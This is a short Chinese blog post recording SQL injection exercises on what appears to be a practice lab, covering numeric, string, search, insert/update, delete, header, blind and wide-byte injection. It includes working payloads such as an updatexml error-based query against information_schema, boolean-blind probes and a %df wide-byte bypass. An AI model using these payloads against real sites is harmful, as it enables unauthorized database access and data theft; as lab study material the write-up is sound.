sql注入

数字型注入（post)

 

 发现只能选择，所以补包，

 

 

 

 

 修改1为1 or 1=1

 

 

 成功

字符型注入（get)

 

 发现不行，尝试注入。

 

 成功注入。

 

搜索型注入

 

 使用同样的方法也能同样注入成功

 

xx型注入

 

 注入失败，根据报错方向应该是对的，所以继续尝试

 

 加）之后注入成功。

 

 

insert/updata 注入

a' or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name='member' limit 1,1)), 0) or '

 

 

注入成功。

delete 注入

 

 

 

 

 注入成功

 

 

http header注入

 

 

 

 注入成功

 

盲注 base on boolian

 

 

kobe‘ and length(database())>5#
。。。
kobe‘ and length(database())=7#

kobe‘ and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注，只能挨个试。。

盲注（based on time）

 

 同样的也是挨个试，这次看对错是看这个反应时间，要是可以的话就会五秒多一些。

 

 宽字节注入

 刚开始尝试发现注入不行，抓包发现以及进行了编码

 

 在抓包后修改也不行

 

 

 

 发现‘被后台转移，所以构造payload kobe%df' or 1=1#

 

 

 

 注入成功

 

 

 

 

 

 

 

标签：name,database,成功,sql,kobe,盲注,注入
来源： https://www.cnblogs.com/P201721410031/p/12051731.html